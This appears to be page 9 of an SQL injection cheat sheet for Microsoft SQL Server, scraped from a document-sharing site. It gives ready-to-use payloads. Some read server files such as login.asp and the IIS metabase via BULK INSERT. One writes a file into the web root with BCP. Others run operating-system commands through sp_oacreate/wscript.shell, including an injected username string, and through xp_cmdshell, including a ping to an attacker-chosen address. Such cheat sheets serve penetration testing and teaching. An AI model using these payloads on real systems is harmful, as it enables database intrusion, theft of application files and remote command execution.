Sql Injection Cheat Sheet Page 9
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18it like any other column, you don't need to supply table name. Also you can use insert,
update statements or in functions.
INSERT INTO members(id, user, pass) VALUES(1,
''+SUBSTRING(@@version,1,10) ,10)
Bulk Insert (S)
Insert a file content to a table. If you don't know internal path of web application you
can read IIS (IIS 6 only) metabase file
(%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify
application path.
1. Create table foo( line varchar(8000) )
2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout
c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
Executing system commands, xp_cmdshell (S)
Well known trick, By default it's disabled in SQL Server 2005. You need to have admin
access.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
Simple ping check (configure your firewall or sniffer to identify request before launch
it),
EXEC master.dbo.xp_cmdshell 'ping <ip address>'
You can not read results directly from error or union or something else.
Some Special Tables in SQL Server (S)
•
Error Messages
master..sysmessages
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education